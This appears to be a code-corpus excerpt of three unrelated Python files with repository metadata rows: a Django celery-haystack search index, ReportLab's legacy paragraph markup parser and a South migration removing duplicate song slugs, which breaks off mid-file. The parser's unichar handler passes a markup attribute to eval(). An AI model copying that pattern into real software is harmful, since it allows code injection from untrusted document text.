from django.db.models import signals from celery_haystack.indexes import CelerySearchIndex as BaseCelerySearchIndex from crate.web.packages.models import Package, Release, ReleaseFile class PackageCelerySearchIndex(BaseCelerySearchIndex): # We override the built-in _setup_* methods to connect the enqueuing # operation. def _setup_save(self, model=None): model = self.handle_model(model) signals.post_save.connect(self.enqueue_save, sender=model) signals.post_save.connect(self.enqueue_save_from_release, sender=Release) signals.post_save.connect(self.enqueue_save_from_releasefile, sender=ReleaseFile) def _setup_delete(self, model=None): model = self.handle_model(model) signals.post_delete.connect(self.enqueue_delete, sender=model) signals.post_delete.connect(self.enqueue_delete_from_release, sender=Release) signals.post_delete.connect(self.enqueue_delete_from_releasefile, sender=ReleaseFile) def _teardown_save(self, model=None): model = self.handle_model(model) signals.post_save.disconnect(self.enqueue_save, sender=model) signals.post_save.disconnect(self.enqueue_save_from_release, sender=Release) signals.post_save.disconnect(self.enqueue_save_from_releasefile, sender=ReleaseFile) def _teardown_delete(self, model=None): model = self.handle_model(model) signals.post_delete.disconnect(self.enqueue_delete, sender=model) signals.post_delete.disconnect(self.enqueue_delete_from_release, sender=Release) signals.post_delete.disconnect(self.enqueue_delete_from_releasefile, sender=ReleaseFile) def enqueue_save_from_release(self, instance, **kwargs): return self.enqueue('update', instance.package) def enqueue_delete_from_release(self, instance, **kwargs): try: return self.enqueue('update', instance.package) except Package.DoesNotExist: pass def enqueue_save_from_releasefile(self, instance, **kwargs): return self.enqueue('update', instance.release.package) def enqueue_delete_from_releasefile(self, instance, **kwargs): try: return self.enqueue('update', instance.release.package) except Release.DoesNotExist: pass
bsd-2-clause
6,856,013,931,906,348,000
43.365385
96
0.714781
false
3.890388
false
false
false
makinacorpus/reportlab-ecomobile
src/reportlab/platypus/paraparser.py
1
37402
#Copyright ReportLab Europe Ltd. 2000-2004 #see license.txt for license details #history http://www.reportlab.co.uk/cgi-bin/viewcvs.cgi/public/reportlab/trunk/reportlab/platypus/paraparser.py __version__=''' $Id$ ''' __doc__='''The parser used to process markup within paragraphs''' import string import re from types import TupleType, UnicodeType, StringType import sys import os import copy import unicodedata import reportlab.lib.sequencer from reportlab.lib.abag import ABag from reportlab.lib.utils import ImageReader from reportlab.lib import xmllib from reportlab.lib.colors import toColor, white, black, red, Color from reportlab.lib.fonts import tt2ps, ps2tt from reportlab.lib.enums import TA_LEFT, TA_RIGHT, TA_CENTER, TA_JUSTIFY from reportlab.lib.units import inch,mm,cm,pica _re_para = re.compile(r'^\s*<\s*para(?:\s+|>|/>)') sizeDelta = 2 # amount to reduce font size by for super and sub script subFraction = 0.5 # fraction of font size that a sub script should be lowered superFraction = 0.5 # fraction of font size that a super script should be raised def _convnum(s, unit=1): if s[0] in ['+','-']: try: return ('relative',int(s)*unit) except ValueError: return ('relative',float(s)*unit) else: try: return int(s)*unit except ValueError: return float(s)*unit def _num(s, unit=1): """Convert a string like '10cm' to an int or float (in points). The default unit is point, but optionally you can use other default units like mm. """ if s[-2:]=='cm': unit=cm s = s[:-2] if s[-2:]=='in': unit=inch s = s[:-2] if s[-2:]=='pt': unit=1 s = s[:-2] if s[-1:]=='i': unit=inch s = s[:-1] if s[-2:]=='mm': unit=mm s = s[:-2] if s[-4:]=='pica': unit=pica s = s[:-4] return _convnum(s,unit) class _PCT: def __init__(self,v): self._value = v*0.01 def normalizedValue(self,normalizer): return normalizer*self._value def _valignpc(s): s = s.lower() if s in ('baseline','sub','super','top','text-top','middle','bottom','text-bottom'): return s if s.endswith('%'): n = _convnum(s[:-1]) if isinstance(n,tuple): n = n[1] return _PCT(n) n = _num(s) if isinstance(n,tuple): n = n[1] return n def _autoLeading(x): x = x.lower() if x in ('','min','max','off'): return x raise ValueError('Invalid autoLeading=%r' % x ) def _align(s): s = string.lower(s) if s=='left': return TA_LEFT elif s=='right': return TA_RIGHT elif s=='justify': return TA_JUSTIFY elif s in ('centre','center'): return TA_CENTER else: raise ValueError _paraAttrMap = {'font': ('fontName', None), 'face': ('fontName', None), 'fontsize': ('fontSize', _num), 'size': ('fontSize', _num), 'leading': ('leading', _num), 'autoleading': ('autoLeading', _autoLeading), 'lindent': ('leftIndent', _num), 'rindent': ('rightIndent', _num), 'findent': ('firstLineIndent', _num), 'align': ('alignment', _align), 'spaceb': ('spaceBefore', _num), 'spacea': ('spaceAfter', _num), 'bfont': ('bulletFontName', None), 'bfontsize': ('bulletFontSize',_num), 'boffsety': ('bulletOffsetY',_num), 'bindent': ('bulletIndent',_num), 'bcolor': ('bulletColor',toColor), 'color':('textColor',toColor), 'backcolor':('backColor',toColor), 'bgcolor':('backColor',toColor), 'bg':('backColor',toColor), 'fg': ('textColor',toColor), } _bulletAttrMap = { 'font': ('bulletFontName', None), 'face': ('bulletFontName', None), 'size': ('bulletFontSize',_num), 'fontsize': ('bulletFontSize',_num), 'offsety': ('bulletOffsetY',_num), 'indent': ('bulletIndent',_num), 'color': ('bulletColor',toColor), 'fg': ('bulletColor',toColor), } #things which are valid font attributes _fontAttrMap = {'size': ('fontSize', _num), 'face': ('fontName', None), 'name': ('fontName', None), 'fg': ('textColor', toColor), 'color':('textColor', toColor), 'backcolor':('backColor',toColor), 'bgcolor':('backColor',toColor), } #things which are valid font attributes _linkAttrMap = {'size': ('fontSize', _num), 'face': ('fontName', None), 'name': ('fontName', None), 'fg': ('textColor', toColor), 'color':('textColor', toColor), 'backcolor':('backColor',toColor), 'bgcolor':('backColor',toColor), 'dest': ('link', None), 'destination': ('link', None), 'target': ('link', None), 'href': ('link', None), } _anchorAttrMap = {'fontSize': ('fontSize', _num), 'fontName': ('fontName', None), 'name': ('name', None), 'fg': ('textColor', toColor), 'color':('textColor', toColor), 'backcolor':('backColor',toColor), 'bgcolor':('backColor',toColor), 'href': ('href', None), } _imgAttrMap = { 'src': ('src', None), 'width': ('width',_num), 'height':('height',_num), 'valign':('valign',_valignpc), } def _addAttributeNames(m): K = m.keys() for k in K: n = m[k][0] if not m.has_key(n): m[n] = m[k] n = string.lower(n) if not m.has_key(n): m[n] = m[k] _addAttributeNames(_paraAttrMap) _addAttributeNames(_fontAttrMap) _addAttributeNames(_bulletAttrMap) _addAttributeNames(_anchorAttrMap) _addAttributeNames(_linkAttrMap) def _applyAttributes(obj, attr): for k, v in attr.items(): if type(v) is TupleType and v[0]=='relative': #AR 20/5/2000 - remove 1.5.2-ism #v = v[1]+getattr(obj,k,0) if hasattr(obj, k): v = v[1]+getattr(obj,k) else: v = v[1] setattr(obj,k,v) #Named character entities intended to be supported from the special font #with additions suggested by Christoph Zwerschke who also suggested the #numeric entity names that follow. greeks = { 'pound': '\xc2\xa3', 'nbsp': '\xc2\xa0', 'alefsym': '\xe2\x84\xb5', 'Alpha': '\xce\x91', 'alpha': '\xce\xb1', 'and': '\xe2\x88\xa7', 'ang': '\xe2\x88\xa0', 'asymp': '\xe2\x89\x88', 'Beta': '\xce\x92', 'beta': '\xce\xb2', 'bull': '\xe2\x80\xa2', 'cap': '\xe2\x88\xa9', 'Chi': '\xce\xa7', 'chi': '\xcf\x87', 'clubs': '\xe2\x99\xa3', 'cong': '\xe2\x89\x85', 'cup': '\xe2\x88\xaa', 'darr': '\xe2\x86\x93', 'dArr': '\xe2\x87\x93', 'delta': '\xce\xb4', 'Delta': '\xe2\x88\x86', 'diams': '\xe2\x99\xa6', 'empty': '\xe2\x88\x85', 'Epsilon': '\xce\x95', 'epsilon': '\xce\xb5', 'epsiv': '\xce\xb5', 'equiv': '\xe2\x89\xa1', 'Eta': '\xce\x97', 'eta': '\xce\xb7', 'euro': '\xe2\x82\xac', 'exist': '\xe2\x88\x83', 'forall': '\xe2\x88\x80', 'frasl': '\xe2\x81\x84', 'Gamma': '\xce\x93', 'gamma': '\xce\xb3', 'ge': '\xe2\x89\xa5', 'harr': '\xe2\x86\x94', 'hArr': '\xe2\x87\x94', 'hearts': '\xe2\x99\xa5', 'hellip': '\xe2\x80\xa6', 'image': '\xe2\x84\x91', 'infin': '\xe2\x88\x9e', 'int': '\xe2\x88\xab', 'Iota': '\xce\x99', 'iota': '\xce\xb9', 'isin': '\xe2\x88\x88', 'Kappa': '\xce\x9a', 'kappa': '\xce\xba', 'Lambda': '\xce\x9b', 'lambda': '\xce\xbb', 'lang': '\xe2\x8c\xa9', 'larr': '\xe2\x86\x90', 'lArr': '\xe2\x87\x90', 'lceil': '\xef\xa3\xae', 'le': '\xe2\x89\xa4', 'lfloor': '\xef\xa3\xb0', 'lowast': '\xe2\x88\x97', 'loz': '\xe2\x97\x8a', 'minus': '\xe2\x88\x92', 'mu': '\xc2\xb5', 'Mu': '\xce\x9c', 'nabla': '\xe2\x88\x87', 'ne': '\xe2\x89\xa0', 'ni': '\xe2\x88\x8b', 'notin': '\xe2\x88\x89', 'nsub': '\xe2\x8a\x84', 'Nu': '\xce\x9d', 'nu': '\xce\xbd', 'oline': '\xef\xa3\xa5', 'omega': '\xcf\x89', 'Omega': '\xe2\x84\xa6', 'Omicron': '\xce\x9f', 'omicron': '\xce\xbf', 'oplus': '\xe2\x8a\x95', 'or': '\xe2\x88\xa8', 'otimes': '\xe2\x8a\x97', 'part': '\xe2\x88\x82', 'perp': '\xe2\x8a\xa5', 'Phi': '\xce\xa6', 'phi': '\xcf\x95', 'phis': '\xcf\x86', 'Pi': '\xce\xa0', 'pi': '\xcf\x80', 'piv': '\xcf\x96', 'prime': '\xe2\x80\xb2', 'prod': '\xe2\x88\x8f', 'prop': '\xe2\x88\x9d', 'Psi': '\xce\xa8', 'psi': '\xcf\x88', 'radic': '\xe2\x88\x9a', 'rang': '\xe2\x8c\xaa', 'rarr': '\xe2\x86\x92', 'rArr': '\xe2\x87\x92', 'rceil': '\xef\xa3\xb9', 'real': '\xe2\x84\x9c', 'rfloor': '\xef\xa3\xbb', 'Rho': '\xce\xa1', 'rho': '\xcf\x81', 'sdot': '\xe2\x8b\x85', 'Sigma': '\xce\xa3', 'sigma': '\xcf\x83', 'sigmaf': '\xcf\x82', 'sigmav': '\xcf\x82', 'sim': '\xe2\x88\xbc', 'spades': '\xe2\x99\xa0', 'sub': '\xe2\x8a\x82', 'sube': '\xe2\x8a\x86', 'sum': '\xe2\x88\x91', 'sup': '\xe2\x8a\x83', 'supe': '\xe2\x8a\x87', 'Tau': '\xce\xa4', 'tau': '\xcf\x84', 'there4': '\xe2\x88\xb4', 'Theta': '\xce\x98', 'theta': '\xce\xb8', 'thetasym': '\xcf\x91', 'thetav': '\xcf\x91', 'trade': '\xef\xa3\xaa', 'uarr': '\xe2\x86\x91', 'uArr': '\xe2\x87\x91', 'upsih': '\xcf\x92', 'Upsilon': '\xce\xa5', 'upsilon': '\xcf\x85', 'weierp': '\xe2\x84\x98', 'Xi': '\xce\x9e', 'xi': '\xce\xbe', 'Zeta': '\xce\x96', 'zeta': '\xce\xb6', } #------------------------------------------------------------------------ class ParaFrag(ABag): """class ParaFrag contains the intermediate representation of string segments as they are being parsed by the XMLParser. fontname, fontSize, rise, textColor, cbDefn """ _greek2Utf8=None def _greekConvert(data): global _greek2Utf8 if not _greek2Utf8: from reportlab.pdfbase.rl_codecs import RL_Codecs import codecs dm = decoding_map = codecs.make_identity_dict(xrange(32,256)) for k in xrange(0,32): dm[k] = None dm.update(RL_Codecs._RL_Codecs__rl_codecs_data['symbol'][0]) _greek2Utf8 = {} for k,v in dm.iteritems(): if not v: u = '\0' else: u = unichr(v).encode('utf8') _greek2Utf8[chr(k)] = u return ''.join(map(_greek2Utf8.__getitem__,data)) #------------------------------------------------------------------ # !!! NOTE !!! THIS TEXT IS NOW REPLICATED IN PARAGRAPH.PY !!! # The ParaFormatter will be able to format the following # tags: # < /b > - bold # < /i > - italics # < u > < /u > - underline # < strike > < /strike > - strike through # < super > < /super > - superscript # < sup > < /sup > - superscript # < sub > < /sub > - subscript # <font name=fontfamily/fontname color=colorname size=float> # < bullet > </bullet> - bullet text (at head of para only) # <onDraw name=callable label="a label"> # <link>link text</link> # attributes of links # size/fontSize=num # name/face/fontName=name # fg/textColor/color=color # backcolor/backColor/bgcolor=color # dest/destination/target/href/link=target # <a>anchor text</a> # attributes of anchors # fontSize=num # fontName=name # fg/textColor/color=color # backcolor/backColor/bgcolor=color # href=href # <a name="anchorpoint"/> # <unichar name="unicode character name"/> # <unichar value="unicode code point"/> # <img src="path" width="1in" height="1in" valign="bottom"/> # <greek> - </greek> # # The whole may be surrounded by <para> </para> tags # # It will also be able to handle any MathML specified Greek characters. #------------------------------------------------------------------ class ParaParser(xmllib.XMLParser): #---------------------------------------------------------- # First we will define all of the xml tag handler functions. # # start_<tag>(attributes) # end_<tag>() # # While parsing the xml ParaFormatter will call these # functions to handle the string formatting tags. # At the start of each tag the corresponding field will # be set to 1 and at the end tag the corresponding field will # be set to 0. Then when handle_data is called the options # for that data will be aparent by the current settings. #---------------------------------------------------------- def __getattr__( self, attrName ): """This way we can handle <TAG> the same way as <tag> (ignoring case).""" if attrName!=attrName.lower() and attrName!="caseSensitive" and not self.caseSensitive and \ (attrName.startswith("start_") or attrName.startswith("end_")): return getattr(self,attrName.lower()) raise AttributeError, attrName #### bold def start_b( self, attributes ): self._push(bold=1) def end_b( self ): self._pop(bold=1) def start_strong( self, attributes ): self._push(bold=1) def end_strong( self ): self._pop(bold=1) #### italics def start_i( self, attributes ): self._push(italic=1) def end_i( self ): self._pop(italic=1) def start_em( self, attributes ): self._push(italic=1) def end_em( self ): self._pop(italic=1) #### underline def start_u( self, attributes ): self._push(underline=1) def end_u( self ): self._pop(underline=1) #### strike def start_strike( self, attributes ): self._push(strike=1) def end_strike( self ): self._pop(strike=1) #### link def start_link(self, attributes): self._push(**self.getAttributes(attributes,_linkAttrMap)) def end_link(self): frag = self._stack[-1] del self._stack[-1] assert frag.link!=None #### anchor def start_a(self, attributes): A = self.getAttributes(attributes,_anchorAttrMap) name = A.get('name',None) if name is not None: name = name.strip() if not name: self._syntax_error('<a name="..."/> anchor variant requires non-blank name') if len(A)>1: self._syntax_error('<a name="..."/> anchor variant only allows name attribute') A = dict(name=A['name']) A['_selfClosingTag'] = 'anchor' else: href = A.get('href','').strip() if not href: self._syntax_error('<a> tag must have non-blank name or href attribute') A['link'] = href #convert to our link form A.pop('href') self._push(**A) def end_a(self): frag = self._stack[-1] sct = getattr(frag,'_selfClosingTag','') if sct: assert sct=='anchor' and frag.name,'Parser failure in <a/>' defn = frag.cbDefn = ABag() defn.label = defn.kind = 'anchor' defn.name = frag.name del frag.name, frag._selfClosingTag self.handle_data('') self._pop() else: del self._stack[-1] assert frag.link!=None def start_img(self,attributes): A = self.getAttributes(attributes,_imgAttrMap) if not A.get('src'): self._syntax_error('<img> needs src attribute') A['_selfClosingTag'] = 'img' self._push(**A) def end_img(self): frag = self._stack[-1] assert getattr(frag,'_selfClosingTag',''),'Parser failure in <img/>' defn = frag.cbDefn = ABag() defn.kind = 'img' defn.src = getattr(frag,'src',None) defn.image = ImageReader(defn.src) size = defn.image.getSize() defn.width = getattr(frag,'width',size[0]) defn.height = getattr(frag,'height',size[1]) defn.valign = getattr(frag,'valign','bottom') del frag._selfClosingTag self.handle_data('') self._pop() #### super script def start_super( self, attributes ): self._push(super=1) def end_super( self ): self._pop(super=1) start_sup = start_super end_sup = end_super #### sub script def start_sub( self, attributes ): self._push(sub=1) def end_sub( self ): self._pop(sub=1) #### greek script #### add symbol encoding def handle_charref(self, name): try: if name[0]=='x': n = int(name[1:],16) else: n = int(name) except ValueError: self.unknown_charref(name) return self.handle_data(unichr(n).encode('utf8')) def handle_entityref(self,name): if greeks.has_key(name): self.handle_data(greeks[name]) else: xmllib.XMLParser.handle_entityref(self,name) def syntax_error(self,lineno,message): self._syntax_error(message) def _syntax_error(self,message): if message[:10]=="attribute " and message[-17:]==" value not quoted": return self.errors.append(message) def start_greek(self, attr): self._push(greek=1) def end_greek(self): self._pop(greek=1) def start_unichar(self, attr): if attr.has_key('name'): if attr.has_key('code'): self._syntax_error('<unichar/> invalid with both name and code attributes') try: v = unicodedata.lookup(attr['name']).encode('utf8') except KeyError: self._syntax_error('<unichar/> invalid name attribute\n"%s"' % name) v = '\0' elif attr.has_key('code'): try: v = unichr(int(eval(attr['code']))).encode('utf8') except: self._syntax_error('<unichar/> invalid code attribute %s' % attr['code']) v = '\0' else: v = None if attr: self._syntax_error('<unichar/> invalid attribute %s' % attr.keys()[0]) if v is not None: self.handle_data(v) self._push(_selfClosingTag='unichar') def end_unichar(self): self._pop() def start_font(self,attr): self._push(**self.getAttributes(attr,_fontAttrMap)) def end_font(self): self._pop() def start_br(self, attr): #just do the trick to make sure there is no content self._push(_selfClosingTag='br',lineBreak=True,text='') def end_br(self): frag = self._stack[-1] assert frag._selfClosingTag=='br' and frag.lineBreak,'Parser failure in <br/>' del frag._selfClosingTag self.handle_data('') self._pop() def _initial_frag(self,attr,attrMap,bullet=0): style = self._style if attr!={}: style = copy.deepcopy(style) _applyAttributes(style,self.getAttributes(attr,attrMap)) self._style = style # initialize semantic values frag = ParaFrag() frag.sub = 0 frag.super = 0 frag.rise = 0 frag.underline = 0 frag.strike = 0 frag.greek = 0 frag.link = None if bullet: frag.fontName, frag.bold, frag.italic = ps2tt(style.bulletFontName) frag.fontSize = style.bulletFontSize frag.textColor = hasattr(style,'bulletColor') and style.bulletColor or style.textColor else: frag.fontName, frag.bold, frag.italic = ps2tt(style.fontName) frag.fontSize = style.fontSize frag.textColor = style.textColor return frag def start_para(self,attr): self._stack = [self._initial_frag(attr,_paraAttrMap)] def end_para(self): self._pop() def start_bullet(self,attr): if hasattr(self,'bFragList'): self._syntax_error('only one <bullet> tag allowed') self.bFragList = [] frag = self._initial_frag(attr,_bulletAttrMap,1) frag.isBullet = 1 self._stack.append(frag) def end_bullet(self): self._pop() #--------------------------------------------------------------- def start_seqdefault(self, attr): try: default = attr['id'] except KeyError: default = None self._seq.setDefaultCounter(default) def end_seqdefault(self): pass def start_seqreset(self, attr): try: id = attr['id'] except KeyError: id = None try: base = int(attr['base']) except: base=0 self._seq.reset(id, base) def end_seqreset(self): pass def start_seqchain(self, attr): try: order = attr['order'] except KeyError: order = '' order = order.split() seq = self._seq for p,c in zip(order[:-1],order[1:]): seq.chain(p, c) end_seqchain = end_seqreset def start_seqformat(self, attr): try: id = attr['id'] except KeyError: id = None try: value = attr['value'] except KeyError: value = '1' self._seq.setFormat(id,value) end_seqformat = end_seqreset # AR hacking in aliases to allow the proper casing for RML. # the above ones should be deprecated over time. 2001-03-22 start_seqDefault = start_seqdefault end_seqDefault = end_seqdefault start_seqReset = start_seqreset end_seqReset = end_seqreset start_seqChain = start_seqchain end_seqChain = end_seqchain start_seqFormat = start_seqformat end_seqFormat = end_seqformat def start_seq(self, attr): #if it has a template, use that; otherwise try for id; #otherwise take default sequence if attr.has_key('template'): templ = attr['template'] self.handle_data(templ % self._seq) return elif attr.has_key('id'): id = attr['id'] else: id = None increment = attr.get('inc', None) if not increment: output = self._seq.nextf(id) else: #accepts "no" for do not increment, or an integer. #thus, 0 and 1 increment by the right amounts. if increment.lower() == 'no': output = self._seq.thisf(id) else: incr = int(increment) output = self._seq.thisf(id) self._seq.reset(id, self._seq._this() + incr) self.handle_data(output) def end_seq(self): pass def start_onDraw(self,attr): defn = ABag() if attr.has_key('name'): defn.name = attr['name'] else: self._syntax_error('<onDraw> needs at least a name attribute') if attr.has_key('label'): defn.label = attr['label'] defn.kind='onDraw' self._push(cbDefn=defn) self.handle_data('') self._pop() #--------------------------------------------------------------- def _push(self,**attr): frag = copy.copy(self._stack[-1]) _applyAttributes(frag,attr) self._stack.append(frag) def _pop(self,**kw): frag = self._stack[-1] del self._stack[-1] for k, v in kw.items(): assert getattr(frag,k)==v return frag def getAttributes(self,attr,attrMap): A = {} for k, v in attr.items(): if not self.caseSensitive: k = string.lower(k) if k in attrMap.keys(): j = attrMap[k] func = j[1] try: A[j[0]] = (func is None) and v or func(v) except: self._syntax_error('%s: invalid value %s'%(k,v)) else: self._syntax_error('invalid attribute name %s'%k) return A #---------------------------------------------------------------- def __init__(self,verbose=0): self.caseSensitive = 0 xmllib.XMLParser.__init__(self,verbose=verbose) def _iReset(self): self.fragList = [] if hasattr(self, 'bFragList'): delattr(self,'bFragList') def _reset(self, style): '''reset the parser''' xmllib.XMLParser.reset(self) # initialize list of string segments to empty self.errors = [] self._style = style self._iReset() #---------------------------------------------------------------- def handle_data(self,data): "Creates an intermediate representation of string segments." frag = copy.copy(self._stack[-1]) if hasattr(frag,'cbDefn'): kind = frag.cbDefn.kind if data: self._syntax_error('Only empty <%s> tag allowed' % kind) elif hasattr(frag,'_selfClosingTag'): if data!='': self._syntax_error('No content allowed in %s tag' % frag._selfClosingTag) return else: # if sub and super are both on they will cancel each other out if frag.sub == 1 and frag.super == 1: frag.sub = 0 frag.super = 0 if frag.sub: frag.rise = -frag.fontSize*subFraction frag.fontSize = max(frag.fontSize-sizeDelta,3) elif frag.super: frag.rise = frag.fontSize*superFraction frag.fontSize = max(frag.fontSize-sizeDelta,3) if frag.greek: frag.fontName = 'symbol' data = _greekConvert(data) # bold, italic, and underline frag.fontName = tt2ps(frag.fontName,frag.bold,frag.italic) #save our data frag.text = data if hasattr(frag,'isBullet'): delattr(frag,'isBullet') self.bFragList.append(frag) else: self.fragList.append(frag) def handle_cdata(self,data): self.handle_data(data) def _setup_for_parse(self,style): self._seq = reportlab.lib.sequencer.getSequencer() self._reset(style) # reinitialise the parser def parse(self, text, style): """Given a formatted string will return a list of ParaFrag objects with their calculated widths. If errors occur None will be returned and the self.errors holds a list of the error messages. """ # AR 20040612 - when we feed Unicode strings in, sgmlop # tries to coerce to ASCII. Must intercept, coerce to # any 8-bit encoding which defines most of 256 points, # and revert at end. Yuk. Preliminary step prior to # removal of parser altogether. enc = self._enc = 'utf8' #our legacy default self._UNI = type(text) is UnicodeType if self._UNI: text = text.encode(enc) self._setup_for_parse(style) # the xmlparser requires that all text be surrounded by xml # tags, therefore we must throw some unused flags around the # given string if not(len(text)>=6 and text[0]=='<' and _re_para.match(text)): text = "<para>"+text+"</para>" self.feed(text) self.close() # force parsing to complete return self._complete_parse() def _complete_parse(self): del self._seq style = self._style del self._style if len(self.errors)==0: fragList = self.fragList bFragList = hasattr(self,'bFragList') and self.bFragList or None self._iReset() else: fragList = bFragList = None if self._UNI: #reconvert to unicode if fragList: for frag in fragList: frag.text = unicode(frag.text, self._enc) if bFragList: for frag in bFragList: frag.text = unicode(frag.text, self._enc) return style, fragList, bFragList def _tt_parse(self,tt): tag = tt[0] try: start = getattr(self,'start_'+tag) end = getattr(self,'end_'+tag) except AttributeError: raise ValueError('Invalid tag "%s"' % tag) start(tt[1] or {}) C = tt[2] if C: M = self._tt_handlers for c in C: M[type(c) is TupleType](c) end() def tt_parse(self,tt,style): '''parse from tupletree form''' self._setup_for_parse(style) self._tt_handlers = self.handle_data,self._tt_parse self._tt_parse(tt) return self._complete_parse() if __name__=='__main__': from reportlab.platypus import cleanBlockQuotedText _parser=ParaParser() def check_text(text,p=_parser): print '##########' text = cleanBlockQuotedText(text) l,rv,bv = p.parse(text,style) if rv is None: for l in _parser.errors: print l else: print 'ParaStyle', l.fontName,l.fontSize,l.textColor for l in rv: print l.fontName,l.fontSize,l.textColor,l.bold, l.rise, '|%s|'%l.text[:25], if hasattr(l,'cbDefn'): print 'cbDefn',getattr(l.cbDefn,'name',''),getattr(l.cbDefn,'label',''),l.cbDefn.kind else: print style=ParaFrag() style.fontName='Times-Roman' style.fontSize = 12 style.textColor = black style.bulletFontName = black style.bulletFontName='Times-Roman' style.bulletFontSize=12 text=''' <b><i><greek>a</greek>D</i></b>&beta;<unichr value="0x394"/> <font name="helvetica" size="15" color=green> Tell me, O muse, of that ingenious hero who travelled far and wide after</font> he had sacked the famous town of Troy. Many cities did he visit, and many were the nations with whose manners and customs he was acquainted; moreover he suffered much by sea while trying to save his own life and bring his men safely home; but do what he might he could not save his men, for they perished through their own sheer folly in eating the cattle of the Sun-god Hyperion; so the god prevented them from ever reaching home. Tell me, too, about all these things, O daughter of Jove, from whatsoever source you<super>1</super> may know them. ''' check_text(text) check_text('<para> </para>') check_text('<para font="times-bold" size=24 leading=28.8 spaceAfter=72>ReportLab -- Reporting for the Internet Age</para>') check_text(''' <font color=red>&tau;</font>Tell me, O muse, of that ingenious hero who travelled far and wide after he had sacked the famous town of Troy. Many cities did he visit, and many were the nations with whose manners and customs he was acquainted; moreover he suffered much by sea while trying to save his own life and bring his men safely home; but do what he might he could not save his men, for they perished through their own sheer folly in eating the cattle of the Sun-god Hyperion; so the god prevented them from ever reaching home. Tell me, too, about all these things, O daughter of Jove, from whatsoever source you may know them.''') check_text(''' Telemachus took this speech as of good omen and rose at once, for he was bursting with what he had to say. He stood in the middle of the assembly and the good herald Pisenor brought him his staff. Then, turning to Aegyptius, "Sir," said he, "it is I, as you will shortly learn, who have convened you, for it is I who am the most aggrieved. I have not got wind of any host approaching about which I would warn you, nor is there any matter of public moment on which I would speak. My grieveance is purely personal, and turns on two great misfortunes which have fallen upon my house. The first of these is the loss of my excellent father, who was chief among all you here present, and was like a father to every one of you; the second is much more serious, and ere long will be the utter ruin of my estate. The sons of all the chief men among you are pestering my mother to marry them against her will. They are afraid to go to her father Icarius, asking him to choose the one he likes best, and to provide marriage gifts for his daughter, but day by day they keep hanging about my father's house, sacrificing our oxen, sheep, and fat goats for their banquets, and never giving so much as a thought to the quantity of wine they drink. No estate can stand such recklessness; we have now no Ulysses to ward off harm from our doors, and I cannot hold my own against them. I shall never all my days be as good a man as he was, still I would indeed defend myself if I had power to do so, for I cannot stand such treatment any longer; my house is being disgraced and ruined. Have respect, therefore, to your own consciences and to public opinion. Fear, too, the wrath of heaven, lest the gods should be displeased and turn upon you. I pray you by Jove and Themis, who is the beginning and the end of councils, [do not] hold back, my friends, and leave me singlehanded- unless it be that my brave father Ulysses did some wrong to the Achaeans which you would now avenge on me, by aiding and abetting these suitors. Moreover, if I am to be eaten out of house and home at all, I had rather you did the eating yourselves, for I could then take action against you to some purpose, and serve you with notices from house to house till I got paid in full, whereas now I have no remedy."''') check_text(''' But as the sun was rising from the fair sea into the firmament of heaven to shed light on mortals and immortals, they reached Pylos the city of Neleus. Now the people of Pylos were gathered on the sea shore to offer sacrifice of black bulls to Neptune lord of the Earthquake. There were nine guilds with five hundred men in each, and there were nine bulls to each guild. As they were eating the inward meats and burning the thigh bones [on the embers] in the name of Neptune, Telemachus and his crew arrived, furled their sails, brought their ship to anchor, and went ashore. ''') check_text(''' So the neighbours and kinsmen of Menelaus were feasting and making merry in his house. There was a bard also to sing to them and play his lyre, while two tumblers went about performing in the midst of them when the man struck up with his tune.]''') check_text(''' "When we had passed the [Wandering] rocks, with Scylla and terrible Charybdis, we reached the noble island of the sun-god, where were the goodly cattle and sheep belonging to the sun Hyperion. While still at sea in my ship I could bear the cattle lowing as they came home to the yards, and the sheep bleating. Then I remembered what the blind Theban prophet Teiresias had told me, and how carefully Aeaean Circe had warned me to shun the island of the blessed sun-god. So being much troubled I said to the men, 'My men, I know you are hard pressed, but listen while I <strike>tell you the prophecy that</strike> Teiresias made me, and how carefully Aeaean Circe warned me to shun the island of the blessed sun-god, for it was here, she said, that our worst danger would lie. Head the ship, therefore, away from the island.''') check_text('''A&lt;B&gt;C&amp;D&quot;E&apos;F''') check_text('''A&lt; B&gt; C&amp; D&quot; E&apos; F''') check_text('''<![CDATA[<>&'"]]>''') check_text('''<bullet face=courier size=14 color=green>+</bullet> There was a bard also to sing to them and play his lyre, while two tumblers went about performing in the midst of them when the man struck up with his tune.]''') check_text('''<onDraw name="myFunc" label="aaa bbb">A paragraph''') check_text('''<para><onDraw name="myFunc" label="aaa bbb">B paragraph</para>''') # HVB, 30.05.2003: Test for new features _parser.caseSensitive=0 check_text('''Here comes <FONT FACE="Helvetica" SIZE="14pt">Helvetica 14</FONT> with <STRONG>strong</STRONG> <EM>emphasis</EM>.''') check_text('''Here comes <font face="Helvetica" size="14pt">Helvetica 14</font> with <Strong>strong</Strong> <em>emphasis</em>.''') check_text('''Here comes <font face="Courier" size="3cm">Courier 3cm</font> and normal again.''') check_text('''Before the break <br/>the middle line <br/> and the last line.''') check_text('''This should be an inline image <img src='../docs/images/testimg.gif'/>!''') check_text('''aaa&nbsp;bbbb <u>underline&#32;</u> cccc''')
bsd-3-clause
6,241,397,755,660,166,000
34.284906
135
0.557778
false
3.475699
false
false
false
romulojales/to-be-musician
to_be_a_musician/songs/migrations/0005_remove_duplicate_slugs.py
1
7856
# -*- coding: utf-8 -*- import datetime from south.db import db from south.v2 import DataMigration from django.db import models class Migration(DataMigration): def forwards(self, orm): "Write your forwards methods here." # Note: Don't use "from appname.models import ModelName". # Use orm.ModelName to refer to models in this application, # and orm['appname.ModelName'] for models in other applications. songs = orm.Song.objects.select_related().order_by('artist__name', 'album__name', 'slug', 'id') for song in songs: duplicated_songs = (orm.Song.objects .filter(artist__slug=song.artist.slug, album__slug=song.album.slug, slug=song.slug) .exclude(pk=song.pk)) i = 1 for duplicated_song in duplicated_songs: duplicated_song.slug = '{0}-{1}'.format(duplicated_song.slug[:47], i) duplicated_song.save() i += 1 def backwards(self, orm): raise RuntimeError('Cannot reverse this migration.') models = { u'auth.group': { 'Meta': {'object_name': 'Group'}, u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}), 'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}) }, u'auth.permission': { 'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'}, 'codename': ('django.db.models.fields.CharField', [], 